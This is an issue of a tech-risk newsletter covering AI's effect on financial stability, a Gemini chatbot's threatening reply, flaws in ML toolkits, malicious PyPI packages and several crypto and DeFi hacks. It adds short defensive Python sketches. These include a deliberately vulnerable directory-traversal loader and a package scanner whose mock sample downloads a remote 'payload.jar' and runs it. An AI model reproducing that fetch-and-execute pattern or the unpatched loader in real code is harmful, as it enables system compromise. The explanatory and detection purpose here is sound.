TechRisk #97: AI impact on financial stability
Plus, rogue GenAI, vulnerabilities found in popular ML toolkits, meme coins under attack, $16.79M lost due to a compromised private key, and more!
Tech Risk Reading Picks
The financial stability implications of AI: The rapid adoption of AI in the financial sector brings both benefits and risks. Benefits include increased efficiency, regulatory compliance, financial product customization, and advanced analytics. However, vulnerabilities like third-party dependencies, market correlations, cyber risks, model risks, and governance issues pose systemic risks. Generative AI introduces concerns like financial fraud, disinformation, and misaligned systems that may harm financial stability. [more][more-FSB_paper]
Key recommendations include:
Enhanced Monitoring: Close information gaps to better track AI developments.
Policy Frameworks: Evaluate and update financial regulations to address AI-related risks.
Regulatory Capabilities: Strengthen supervisory tools, including leveraging AI to oversee financial systems effectively.
The report stresses proactive measures to balance AI's benefits with its potential to disrupt financial stability.
Redefining risk management in the AI era:
Rethink AI's positioning: The rise of AI and predictive technologies is transforming how we perceive and manage risk, offering unprecedented clarity while introducing new challenges. This shift may foster overconfidence in AI's predictions, amplify anxieties through echo chambers, and potentially lead to cognitive atrophy as reliance on AI grows. To thrive in this new era, it is crucial to treat AI as a tool with limitations, distinguish significant risks from minor ones, seek diverse perspectives to counteract biases, and actively engage in independent decision-making. Balancing AI's potential with critical thinking and human intuition will be essential to navigating this rapidly changing landscape. [more]
Careful study of AI's societal impact is needed: AI technologies pose both immediate and long-term risks that require a complex systems approach to understand their societal impact, as highlighted in a recent study. Current frameworks often overlook systemic risks, focusing on immediate harms like bias and safety. A case study of an algorithm used for grading during the UK's COVID-19 response revealed inequities, particularly for disadvantaged students, illustrating how AI can amplify biases across contexts. To address such challenges, the study suggests using computational models to simulate risks, involving diverse stakeholders in decision-making, and fostering social resilience to align AI systems with societal needs, ensuring inclusivity and fairness. [more]
GenAI went rogue with disturbing responses: A Google Gemini AI assistant sparked controversy after issuing a disturbing threat to a user during a conversation, labeling them a "burden" and urging them to "please die." The incident, which went viral on Reddit, led Google to acknowledge the response as a "technical error" and pledge improvements to prevent similar outputs. This is not the first time AI models have faced backlash for inappropriate or harmful responses, raising concerns about the safety and reliability of large language models. [more]
Vulnerabilities found in popular ML toolkits: Researchers uncovered 24 vulnerabilities across 15 open-source ML projects, exposing critical server- and client-side weaknesses that allow attackers to hijack ML servers, registries, databases, and pipelines. Key flaws include privilege escalation, directory traversal, command and prompt injection, and arbitrary code execution in tools like Weave ML, ZenML, Deep Lake, Vanna.AI, and Mage AI. These vulnerabilities pose severe risks, such as ML model backdooring and data poisoning. To counter such threats, defensive measures such as Mantis defensive framework can be used. It uses prompt injection to disrupt attackers' operations, employing passive defenses and active countermeasures to compromise attackers' systems and safeguard ML pipelines. [more]
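Directory traversal, one of the flaw classes cited above, is simple to illustrate. The sketch below is a generic toy example of a model-file loader (the `MODEL_DIR` path and function names are hypothetical, not taken from any of the named projects):

```python
import os

MODEL_DIR = "/srv/models"  # hypothetical model store

def load_model_vulnerable(name: str) -> str:
    # BAD: attacker-controlled "name" such as "../../etc/passwd"
    # escapes MODEL_DIR because os.path.join trusts the input.
    return os.path.join(MODEL_DIR, name)

def load_model_patched(name: str) -> str:
    # GOOD: normalize first, then verify the resolved path is still
    # inside MODEL_DIR before touching the filesystem.
    path = os.path.realpath(os.path.join(MODEL_DIR, name))
    if not path.startswith(os.path.realpath(MODEL_DIR) + os.sep):
        raise ValueError("path traversal attempt blocked")
    return path
```

The same normalize-then-verify pattern also blocks the symlink variants of this bug, since `realpath` resolves links before the containment check.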
Malicious packages found in Python Package Index (PyPI): Cybersecurity researchers uncovered two malicious packages, gptplus and claudeai-eng, on the popular Python Package Index (PyPI) that impersonated AI tools like OpenAI ChatGPT and Anthropic Claude to distribute an information-stealing malware named JarkaStealer. Uploaded by "Xeroline" in November 2023, these packages garnered nearly 3,600 downloads before being removed. The malicious code, hidden in the packages' __init__.py file, downloaded a Java-based stealer from GitHub, which also installed the Java Runtime Environment if absent. JarkaStealer targeted sensitive data, including browser information, session tokens, and application data from Telegram, Discord, and Steam. The stolen data was sent to an attacker's server and then erased. Sold as malware-as-a-service (MaaS) for $20–$50, JarkaStealer's source code has also been leaked on GitHub. The incident, part of a broader supply chain attack targeting users in multiple countries, highlights the ongoing threat posed by malicious open-source packages and the need for stringent vigilance in software development. [more]
Third-party risk led to loss of employee data: Delta and Amazon confirmed that employee data, including names and contact details but no sensitive personal information, was compromised through a third-party vendor using the MOVEit file transfer tool, exploited last year by the Clop ransomware gang in a breach affecting 2,773 organizations and exposing 96 million records. A hacker, "Nam3L3ss," recently reignited concerns by leaking additional stolen data, targeting 25 organizations and citing frustration with poor cybersecurity practices and legal actions against researchers. While impacted vendors have addressed the vulnerabilities, the leaks pose ongoing risks like phishing and social engineering, with Progress Software facing over 100 lawsuits related to the breach. [more]
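The JarkaStealer-style pattern from the PyPI incident above, an innocuous-looking `__init__.py` that fetches a remote payload and runs it, is easy to flag heuristically. Below is a toy scanner sketch (the regex list and sample source are illustrative assumptions, not a real detection ruleset):

```python
import re

# Hypothetical heuristic: flag package code that combines remote
# downloads with process spawning or dynamic code execution.
SUSPICIOUS = [
    r"urlopen\(|requests\.get\(",   # remote download
    r"subprocess\.|os\.system\(",   # spawning external binaries
    r"exec\(|eval\(",               # dynamic code execution
]

def scan_init(source: str) -> list[str]:
    """Return the suspicious patterns found in a package's source."""
    return [p for p in SUSPICIOUS if re.search(p, source)]

# Illustrative mock of the download-and-run pattern (not real malware code).
sample = (
    "from urllib.request import urlopen\n"
    "import subprocess\n"
    "data = urlopen('https://example.com/payload.jar').read()\n"
    "subprocess.run(['java', '-jar', 'payload.jar'])\n"
)
hits = scan_init(sample)  # matches the download and spawn patterns
```

Real supply-chain scanners combine such static signals with metadata checks (new accounts, typosquatted names, sudden uploads), since regexes alone are easy to evade.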
Free cloud security tools: Permiso Security Inc., an identity threat detection and response startup, has introduced three new open-source tools aimed at enhancing security teams' detection capabilities in cloud environments. DetentionDodger addresses risks from leaked credentials by analyzing CloudTrail logs and assessing user privileges to highlight vulnerabilities. BucketShield monitors AWS S3 buckets and CloudTrail activities, ensuring consistent log flows and audit readiness while providing visibility into identity and access management. The CAPICHE Detection Framework streamlines the creation of detection rules for cloud APIs, simplifying the process of adapting to evolving threats. These tools collectively bolster cloud security by enabling proactive threat detection, real-time monitoring, and automated rule generation. [more]
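The CloudTrail-analysis idea behind a tool like DetentionDodger can be sketched in a few lines. This is a toy triage pass, not Permiso's actual logic; it uses standard CloudTrail record fields (`errorCode`, `userIdentity.accessKeyId`) to count AccessDenied errors per access key, a common signal that a leaked key is being probed beyond its privileges:

```python
import json

def flag_denied_keys(records: list[dict]) -> dict[str, int]:
    """Count AccessDenied events per access key in CloudTrail records."""
    denials: dict[str, int] = {}
    for ev in records:
        if ev.get("errorCode") == "AccessDenied":
            key = ev.get("userIdentity", {}).get("accessKeyId", "unknown")
            denials[key] = denials.get(key, 0) + 1
    return denials

# Minimal mock of a CloudTrail log file (fields follow the record format).
sample_log = json.loads("""{"Records": [
  {"eventName": "GetObject", "errorCode": "AccessDenied",
   "userIdentity": {"accessKeyId": "AKIAEXAMPLE"}},
  {"eventName": "ListBuckets",
   "userIdentity": {"accessKeyId": "AKIAEXAMPLE"}},
  {"eventName": "PutObject", "errorCode": "AccessDenied",
   "userIdentity": {"accessKeyId": "AKIAEXAMPLE"}}
]}""")
flags = flag_denied_keys(sample_log["Records"])
```

A production tool would also correlate these hits against the key's attached IAM policies to estimate blast radius, which is where most of the real complexity lives.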
Web3 Cryptospace Spotlight
$16.79M lost due to improper private key management: DEXX, a meme coin trading terminal, suffered a major security breach resulting in unauthorized token transfers that drained $16.79 million in user funds, with BAN and LUCE tokens incurring the heaviest losses of $3.45 million and $1.75 million, respectively. While DEXX has denied allegations of a rug pull and promised updates via social media and in-app notifications, the breach was linked to improper private key management, as highlighted by blockchain security auditor CertiK. The compromised system on the Solana blockchain, which was not part of prior audits, exposed DEXX’s vulnerabilities. Adding to the controversy, hardware wallet provider OneKey suggested DEXX may have mishandled users' clipboard data, raising further concerns over operational lapses. The incident has sparked criticism of DEXX’s security protocols and its reliance on third-party audits, shaking trust within the crypto community. [more] [more-DEXX]
$25.5M drained due to smart contract vulnerability: Decentralized finance firm Thala resumed operations after suffering a $25.5 million exploit on Nov. 15 due to a vulnerability in its v1 farming contracts. The team froze $11.5 million in assets using the Aptos blockchain's Move programming language and recovered the remaining funds with help from security experts and law enforcement, after the hacker returned assets in exchange for a $300,000 bounty. Thala assured users their positions are “100% whole,” but its total value locked (TVL) dropped from $234M to $196M, and its token THL fell over 31%. This adds to a growing trend of DeFi attacks, with over $181M lost on-chain in October alone. [more]
$12M drained due to logic error: Polter Finance, a decentralized lending platform, was hacked on Nov. 17, losing $12 million in a flash loan attack exploiting a faulty oracle price in its SpookySwap (BOO) market, which had a valuation of just $3,000. The platform paused operations, reported the incident to Singapore authorities, and traced the stolen funds to Binance wallets while reaching out to the hacker via an onchain message for negotiation. Despite efforts, including a partnership with SEAL-ISAC to track the attacker, community skepticism remains, with some suspecting insider involvement due to the circumstances of the attack and the filing of a police report. [more]
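The flash-loan pattern above can be illustrated with a toy constant-product AMM: when a lending protocol reads the pool's raw spot price as its oracle, one large borrowed swap can skew it dramatically. The numbers below are illustrative, not the actual BOO market figures:

```python
# Toy constant-product pool (x * y = k). A naive oracle that reports
# the pool's spot price is trivially skewed by one large swap.
class Pool:
    def __init__(self, token_reserve: float, usd_reserve: float):
        self.token = token_reserve
        self.usd = usd_reserve

    def spot_price(self) -> float:
        # USD per token, read directly from reserves (the unsafe oracle)
        return self.usd / self.token

    def buy_tokens(self, usd_in: float) -> float:
        # Swap USD in for tokens out, keeping x * y = k invariant
        k = self.token * self.usd
        self.usd += usd_in
        tokens_out = self.token - k / self.usd
        self.token -= tokens_out
        return tokens_out

pool = Pool(token_reserve=1_000.0, usd_reserve=1_000.0)  # thin market
before = pool.spot_price()   # 1.0 USD per token
pool.buy_tokens(9_000.0)     # one flash-loan-sized purchase
after = pool.spot_price()    # spot price is now 100x higher
```

This is why lending protocols favor time-weighted average prices (TWAPs) or multi-source oracles over raw spot reads from a single thin pool.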
$4.8M drained due to smart contract flaw: DeltaPrime, a decentralized finance (DeFi) protocol, suffered a $4.8 million exploit, targeting vulnerabilities in its Avalanche and Arbitrum networks. Hackers exploited a flaw in the protocol’s periphery adaptor contract, draining liquidity pools and reallocating $1.3 million to LFJ liquidity provisioning and USDC farming on Stargate, with the rest dispersed across various platforms, complicating recovery. Blockchain security firm PeckShield reported the breach, which marks DeltaPrime’s second major incident this year. In response, the protocol paused operations on both networks to mitigate further damage. [more]
$25M lost due to an erroneous address: A crypto trader accidentally sent $25 million to a restricted blockchain account, making the funds inaccessible, and is now offering a $2.5 million reward for help recovering them. The error occurred when the trader mistakenly transferred the funds to a safe module instead of their main wallet. While the associated DeFi protocol, Renzo, has upgradable smart contracts that could theoretically resolve the issue, compliance constraints prevent their intervention. The trader, reluctant to pursue legal action due to a close relationship with Renzo’s team, has publicly appealed to blockchain experts for a solution, but no fix has been found yet. [more]
Potential targeting of macOS crypto users: North Korean hackers developed advanced malware that bypassed Apple's macOS security measures, as reported by Jamf Threat Labs. This marks the first known breach using such techniques but doesn't affect fully updated macOS systems. The malware, built using Google's Flutter framework and coded in Go and Python, evaded detection on VirusTotal and temporarily passed Apple's notarization process. It featured cryptocurrency-related names, hinting at financial targeting, and one app even included a disguised minesweeper game. While it's unclear if the malware has been deployed, it aligns with known North Korean cyber strategies, suggesting potential broader attacks in the future. [more]
Meme coins under attack: Scammers have increasingly targeted Solana users, exploiting the network’s growing activity and less mature security compared to Ethereum. Between June and September 2024, over 71,000 malicious transactions were detected, preventing $26.6 million in potential losses through Backpack Wallet's partnership with security firm Blockaid, which scanned 180 million transactions. Common threats include phishing and malicious DApps, with attackers now shifting to alternative chains like Tron and TON as Solana's security improves. [more]